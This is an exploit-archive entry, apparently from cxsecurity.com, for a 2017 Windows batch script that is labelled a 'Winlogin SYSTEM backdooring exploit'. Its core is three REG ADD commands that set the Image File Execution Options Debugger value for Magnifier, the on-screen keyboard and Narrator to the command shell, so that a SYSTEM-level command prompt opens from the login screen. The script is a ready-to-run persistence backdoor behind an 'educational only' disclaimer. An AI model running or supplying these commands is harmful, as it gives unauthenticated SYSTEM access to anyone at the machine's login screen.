Microsoft Windows IFEO Winlogin SYSTEM Backdooring Exploit

2017.04.21
Credit: Todor Donev
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

@ECHO OFF REM Microsoft Windows 'IFEO' Winlogin SYSTEM Backdooring Exploit REM REM Todor Donev <todor.donev@gmail.com> REM https://www.ethical-hacker.org/ REM https://www.facebook.com/ethicalhackerorg REM REM https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ REM REM Disclaimer: REM This or previous programs is for Educational purpose ONLY. Do not use it without permission. REM The usual disclaimer applies, especially the fact that Todor Donev is not liable for any REM damages caused by direct or indirect use of the information or functionality provided by these REM programs. The author or any Internet provider bears NO responsibility for content or misuse REM of these programs or any derivatives thereof. By using these programs you accept the fact REM that any damage (dataloss, system crash, system compromise, etc.) caused by the use REM of these programs is not Todor Donev's responsibility. REM REM Use them at your own risk! REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnifier.exe" /v Debugger /t REG_SZ /d "%COMSPEC%" REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "%COMSPEC%" REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v Debugger /t REG_SZ /d "%COMSPEC%"

References:

https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top